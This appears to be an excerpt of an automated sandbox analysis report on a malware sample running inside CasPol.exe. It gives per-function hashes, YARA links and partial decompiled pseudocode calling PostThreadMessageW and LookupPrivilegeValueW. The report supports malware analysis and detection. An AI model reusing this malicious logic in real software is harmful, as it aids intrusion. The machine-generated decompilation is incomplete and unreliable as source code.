                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: aa697f00c78aceaf04e1d7be819953edc056a6766e3b53132708f782feaf6553
                                                                                                                                                                                                                                                                                                • Instruction ID: a02d26d7ec26557fa181d3ec39b2f3ad4bf1ce3a3fc096032b69ae73303a77d7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa697f00c78aceaf04e1d7be819953edc056a6766e3b53132708f782feaf6553
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C390026121580046E61065A98C14B074005ABD4343F51C125A0145554CC95588617561
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2302a892617c871ea61e4b3be71ca68e1937bdda545b26c4285e7c67468ce8e6
                                                                                                                                                                                                                                                                                                • Instruction ID: 1e4b7ad3ca4c3f32ff46deaa9077e277f82565e0ca1545421e25891e8b79f712
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2302a892617c871ea61e4b3be71ca68e1937bdda545b26c4285e7c67468ce8e6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED900261246041566955B19984045078006BBE4281B91C022A1405950CC5669856F661
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: efd4ce2bede35fdb560998d71dcc91999d6c758b5a4af0e1cb27f077d3499508
                                                                                                                                                                                                                                                                                                • Instruction ID: 93b2918735910b99c5ac5fb30bfc7285c626a2f393a55757f000d89d55bf53e6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efd4ce2bede35fdb560998d71dcc91999d6c758b5a4af0e1cb27f077d3499508
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D690026160500046555071A9C8449068005BFE5251B51C131A0989550DC599886576A5
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: dc6512260e85df7c45bd5200a9d5774c4ae74ef03ab3138fc84f3575d10c9914
                                                                                                                                                                                                                                                                                                • Instruction ID: b72538b98324365cb001214bd80bbffccba99bc8c99e09337e7f542d07eb3b24
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc6512260e85df7c45bd5200a9d5774c4ae74ef03ab3138fc84f3575d10c9914
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6990027120540406E5106199881470B4005ABD4342F51C021A1155555DC665885175B1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017698F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 65bc9f369eacf39aa5aa9529d05fddd01197d8446d6a2a42884007b6a12ca32b
                                                                                                                                                                                                                                                                                                • Instruction ID: af3f597b3227e2f3171206b46ba91ee7dc8bf4ad98d7966bac02394b0ecf29f7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65bc9f369eacf39aa5aa9529d05fddd01197d8446d6a2a42884007b6a12ca32b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC90026160500506E51171998404616400AABD4281F91C032A1015555ECA658992B171
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017696E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3813fa6e430a4930baca43b208197d956e875da9b3588f8ada0cc52309e9bb84
                                                                                                                                                                                                                                                                                                • Instruction ID: d86571d894426b3fd2a2acd2caa90ea8d76dab3b3eb1235b4ae455faedb57d65
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3813fa6e430a4930baca43b208197d956e875da9b3588f8ada0cc52309e9bb84
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1590027120508806E5206199C40474A4005ABD4341F55C421A4415658DC6D588917161
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0040990D Relevance: 1.6, APIs: 1, Instructions: 65threadwindowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                C-Code - Quality: 63%
                                                                                                                                                                                                                                                                                                			E0040990D(void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v63;
				char _v64;
				char _v68;
				void* _t13;
				int _t15;
				long _t30;
				int _t33;
				void* _t36;
				void* _t38;
				void* _t43;

				_t43 = __eflags;
				_pop(_t38);
				asm("sbb al, 0x83");
				asm("les edx, [ebp-0x75]");
				_t36 = _t38;
				_v64 = 0;
				E004201D3( &_v63, 0, 0x3f);
				E00420C83( &_v64, 3);
				_t19 = _a4;
				_t13 = E0040CF93(_t43, _a4 + 0x20,  &_v68); // executed
				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402E93(0xe49e13e4));
				_t33 = _t15;
				if(_t33 != 0) {
					_t30 = _a8;
					_t15 = PostThreadMessageW(_t30, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						_t15 =  *_t33(_t30, 0x8003, _t36 + (E0040C663(1, 8, _t19 + 0x39c) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}













                                                                                                                                                                                                                                                                                                0x0040990d
                                                                                                                                                                                                                                                                                                0x0040990d
                                                                                                                                                                                                                                                                                                0x0040990e
                                                                                                                                                                                                                                                                                                0x00409912
                                                                                                                                                                                                                                                                                                0x00409914
                                                                                                                                                                                                                                                                                                0x00409924
                                                                                                                                                                                                                                                                                                0x00409928
                                                                                                                                                                                                                                                                                                0x00409933
                                                                                                                                                                                                                                                                                                0x00409938
                                                                                                                                                                                                                                                                                                0x00409943
                                                                                                                                                                                                                                                                                                0x0040995b
                                                                                                                                                                                                                                                                                                0x00409960
                                                                                                                                                                                                                                                                                                0x00409967
                                                                                                                                                                                                                                                                                                0x00409969
                                                                                                                                                                                                                                                                                                0x00409976
                                                                                                                                                                                                                                                                                                0x0040997a
                                                                                                                                                                                                                                                                                                0x0040999e
                                                                                                                                                                                                                                                                                                0x0040999e
                                                                                                                                                                                                                                                                                                0x0040997a
                                                                                                                                                                                                                                                                                                0x004099a6

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a45e96f904ba6af220e1e6b5eef84503465f32b7258073bff8e907eb5740a78b
                                                                                                                                                                                                                                                                                                • Instruction ID: 20480c24435e97d483933209d4d63d1bd1c3dc92514e9563bbea3aa723060474
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a45e96f904ba6af220e1e6b5eef84503465f32b7258073bff8e907eb5740a78b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16110C71A4022476EB21A6A1DC83FFF776CDB45B44F14012EFE04BA1C2D6A9690587E9
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 00409913 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 107 409913-409924 108 40992d-409967 call 420c83 call 40cf93 call 402e93 call 4195b3 107->108 109 409928 call 4201d3 107->109 119 4099a0-4099a6 108->119 120 409969-40997a PostThreadMessageW 108->120 109->108 120->119 121 40997c-40999d call 40c663 120->121 121->119
                                                                                                                                                                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                                			E00409913(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E004201D3( &_v67, 0, 0x3f);
				E00420C83( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CF93(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402E93(0xe49e13e4));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C663(1, 8, _t19 + 0x39c) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}











                                                                                                                                                                                                                                                                                                0x00409913
                                                                                                                                                                                                                                                                                                0x00409924
                                                                                                                                                                                                                                                                                                0x00409928
                                                                                                                                                                                                                                                                                                0x00409933
                                                                                                                                                                                                                                                                                                0x00409938
                                                                                                                                                                                                                                                                                                0x00409943
                                                                                                                                                                                                                                                                                                0x0040995b
                                                                                                                                                                                                                                                                                                0x00409960
                                                                                                                                                                                                                                                                                                0x00409967
                                                                                                                                                                                                                                                                                                0x00409969
                                                                                                                                                                                                                                                                                                0x00409976
                                                                                                                                                                                                                                                                                                0x0040997a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0040999e
                                                                                                                                                                                                                                                                                                0x0040997a
                                                                                                                                                                                                                                                                                                0x004099a6

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 88885eb971ee9bf2be674d98dac1b17f9e40f8ae4f2a1e710c07d70908d087d4
                                                                                                                                                                                                                                                                                                • Instruction ID: 99f33223a06979dd19497cd07b2eb0eced799e52382c08ed34ba0aba74cfe4fe
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88885eb971ee9bf2be674d98dac1b17f9e40f8ae4f2a1e710c07d70908d087d4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB01C871A4031476E721A691DC82FEF376C9B44B44F44012AFE04BA2C2D6A8690586E9
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041E9F4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 124 41e9f4-41e9f8 125 41e9c0-41e9f3 call 41f203 124->125 126 41e9fb-41ea1d call 41f203 124->126 130 41ea22-41ea37 LookupPrivilegeValueW 126->130
                                                                                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                                			E0041E9F4(void* __eax, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				int _t13;

				asm("stc");
				asm("out dx, al");
				asm("repne jo 0xffffffc8");
				_push(_t22);
				_t10 = _v0;
				E0041F203( *((intOrPtr*)(_v0 + 0x6d4)), _t10, _t10 + 0xab8,  *((intOrPtr*)(_v0 + 0x6d4)), 0, 0x46);
				_t13 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
				return _t13;
			}





                                                                                                                                                                                                                                                                                                0x0041e9f6
                                                                                                                                                                                                                                                                                                0x0041e9f7
                                                                                                                                                                                                                                                                                                0x0041e9f8
                                                                                                                                                                                                                                                                                                0x0041ea03
                                                                                                                                                                                                                                                                                                0x0041ea06
                                                                                                                                                                                                                                                                                                0x0041ea1d
                                                                                                                                                                                                                                                                                                0x0041ea33
                                                                                                                                                                                                                                                                                                0x0041ea37

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041EA33
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c2a2af4da3d61573988083e7c8cd680a0c473ef2092f5d3e3f7940d19c0fb83d
                                                                                                                                                                                                                                                                                                • Instruction ID: 37147ff059de123ca1daa7b680345aa8e6bf5e2ed93d8c122108e99bdf0e5716
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2a2af4da3d61573988083e7c8cd680a0c473ef2092f5d3e3f7940d19c0fb83d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D30169B66002086FDB14EF99DC81EEB37ADAF89354F058159FE0997242C235E8558BF0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 004099A7 Relevance: 1.6, APIs: 1, Instructions: 54threadwindowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 132 4099a7-4099aa 133 409930-409967 call 420c83 call 40cf93 call 402e93 call 4195b3 132->133 134 4099ac-4099b2 132->134 143 4099a0-4099a6 133->143 144 409969-40997a PostThreadMessageW 133->144 144->143 145 40997c-40999d call 40c663 144->145 145->143
                                                                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                                			E004099A7(void* __eax, void* __ebx, void* __edx, signed int __esi, intOrPtr _a8, int _a12, char* _a16) {
				intOrPtr _v0;
				char* _v8;
				char* _v12;
				char _v64;
				char* _v132;
				char* _v136;
				char _v656;
				char* _v668;
				char _v688;
				char* _v692;
				intOrPtr __edi;
				void* _t64;
				int _t66;
				char* _t73;
				long _t79;
				int _t82;
				signed int _t84;

				_t84 = __esi * 0xffffffef;
				_t90 = _t84;
				if(_t84 > 0) {
					E00420C83(_t73, 3);
					_t70 = _a8;
					_t64 = E0040CF93(_t90, _a8 + 0x20,  &_v64); // executed
					_t66 = E004195B3(_a8 + 0x20, _t64, 0, 0, E00402E93(0xe49e13e4));
					_t82 = _t66;
					if(_t82 != 0) {
						_t79 = _a12;
						_t66 = PostThreadMessageW(_t79, 0x111, 0, 0); // executed
						if(_t66 == 0) {
							_t66 =  *_t82(_t79, 0x8003, _t84 + (E0040C663(1, 8, _t70 + 0x39c) & 0x000000ff) - 0x40, _t66);
						}
					}
					return _t66;
				} else {
					__eax = __eax + 0x90e7dfc8;
					__ebx = __ebx + 1;
					__eflags = __ebx;
					_push(__edx);
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v12 = 0;
					_v692 = 0;
					 &_v688 = E004201D3( &_v688, 0, 0x2a4);
					__esi = _a12;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _v0;
					__eax = E00409913(__eflags, __edi,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E0041FA23(__ecx);
					_t15 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t15;
					_a12 = 0;
					while(1) {
						__eax = E00410363(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E0041E733(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L12:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L16;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L12;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L12;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E00420153(_a12,  &_v688, 0x2a8);
										L16:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E0041E6C3(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *((intOrPtr*)(_a12 + 0x14)) = _v668;
											__edx =  *((intOrPtr*)(__esi + 0x2d0));
											_t35 = __esi + 0x2e8; // 0x2e8
											__eax = _t35;
											 *_t35 = _v136;
											__eax = _a12;
											_t37 = __esi + 0x314; // 0x314
											__ebx = _t37;
											__ecx = 0;
											__eax = _a12 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E0041DF43(__edi, _a12 + 0x220,  *((intOrPtr*)(__esi + 0x2d0)), __ebx, _a12 + 0x220);
											__ecx = 0;
											 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t45 = __esi + 0x2e0; // 0x2e0
												__eax = _t45;
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												_a12 = _a12 + 0x224;
												 *((intOrPtr*)(__esi + 0x2e4)) = _v132;
												 *__ebx = 0x18;
												 *((intOrPtr*)(__esi + 0x2d0)) = 0x1a;
												__eax = E0041DF83(__edi, _a12 + 0x224, 0x1a, __ebx, _t45);
												 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
													__eflags =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
													__eax = E0041F6C3(__ecx);
													__ebx = __eax;
													__eax =  *((intOrPtr*)(__ebx + 0x28));
													__eax = E00420373( *((intOrPtr*)(__ebx + 0x28)));
													__edx =  *((intOrPtr*)(__ebx + 0x28));
													_t60 = __eax + 2; // 0x2
													__ecx = __eax + _t60;
													__eax = E00420153(__esi,  *((intOrPtr*)(__ebx + 0x28)), __eax + _t60);
													__eax =  &_v656;
													_push( &_v656);
													__eax = E004191A3(); // executed
													__esp = __esp + 0x28;
													__edi = __edi;
													_pop(__esi);
													__ebx = 2;
													__esp = __ebp;
													__ebp = 0;
													return __eax;
												}
											}
										}
									} else {
										goto L12;
									}
								}
							}
						}
						goto L20;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L20:
			}




















                                                                                                                                                                                                                                                                                                0x004099a7
                                                                                                                                                                                                                                                                                                0x004099a7
                                                                                                                                                                                                                                                                                                0x004099aa
                                                                                                                                                                                                                                                                                                0x00409933
                                                                                                                                                                                                                                                                                                0x00409938
                                                                                                                                                                                                                                                                                                0x00409943
                                                                                                                                                                                                                                                                                                0x0040995b
                                                                                                                                                                                                                                                                                                0x00409960
                                                                                                                                                                                                                                                                                                0x00409967
                                                                                                                                                                                                                                                                                                0x00409969
                                                                                                                                                                                                                                                                                                0x00409976
                                                                                                                                                                                                                                                                                                0x0040997a
                                                                                                                                                                                                                                                                                                0x0040999e
                                                                                                                                                                                                                                                                                                0x0040999e
                                                                                                                                                                                                                                                                                                0x0040997a
                                                                                                                                                                                                                                                                                                0x004099a6
                                                                                                                                                                                                                                                                                                0x004099ac
                                                                                                                                                                                                                                                                                                0x004099ac
                                                                                                                                                                                                                                                                                                0x004099b1
                                                                                                                                                                                                                                                                                                0x004099b1
                                                                                                                                                                                                                                                                                                0x004099b2
                                                                                                                                                                                                                                                                                                0x004099b3
                                                                                                                                                                                                                                                                                                0x004099b4
                                                                                                                                                                                                                                                                                                0x004099b6
                                                                                                                                                                                                                                                                                                0x004099bc
                                                                                                                                                                                                                                                                                                0x004099bd
                                                                                                                                                                                                                                                                                                0x004099be
                                                                                                                                                                                                                                                                                                0x004099bf
                                                                                                                                                                                                                                                                                                0x004099c7
                                                                                                                                                                                                                                                                                                0x004099ca
                                                                                                                                                                                                                                                                                                0x004099d7
                                                                                                                                                                                                                                                                                                0x004099dc
                                                                                                                                                                                                                                                                                                0x004099df
                                                                                                                                                                                                                                                                                                0x004099e5
                                                                                                                                                                                                                                                                                                0x004099ea
                                                                                                                                                                                                                                                                                                0x004099f2
                                                                                                                                                                                                                                                                                                0x004099fd
                                                                                                                                                                                                                                                                                                0x004099fd
                                                                                                                                                                                                                                                                                                0x00409a04
                                                                                                                                                                                                                                                                                                0x00409a13
                                                                                                                                                                                                                                                                                                0x00409a19
                                                                                                                                                                                                                                                                                                0x00409a1e
                                                                                                                                                                                                                                                                                                0x00409a2b
                                                                                                                                                                                                                                                                                                0x00409a35
                                                                                                                                                                                                                                                                                                0x00409a3d
                                                                                                                                                                                                                                                                                                0x00409a43
                                                                                                                                                                                                                                                                                                0x00409a45
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409a47
                                                                                                                                                                                                                                                                                                0x00409a4f
                                                                                                                                                                                                                                                                                                0x00409a69
                                                                                                                                                                                                                                                                                                0x00409a69
                                                                                                                                                                                                                                                                                                0x00409a6c
                                                                                                                                                                                                                                                                                                0x00409a6d
                                                                                                                                                                                                                                                                                                0x00409a70
                                                                                                                                                                                                                                                                                                0x00409a73
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409a75
                                                                                                                                                                                                                                                                                                0x00409a75
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409a75
                                                                                                                                                                                                                                                                                                0x00409a51
                                                                                                                                                                                                                                                                                                0x00409a51
                                                                                                                                                                                                                                                                                                0x00409a58
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409a5a
                                                                                                                                                                                                                                                                                                0x00409a5a
                                                                                                                                                                                                                                                                                                0x00409a61
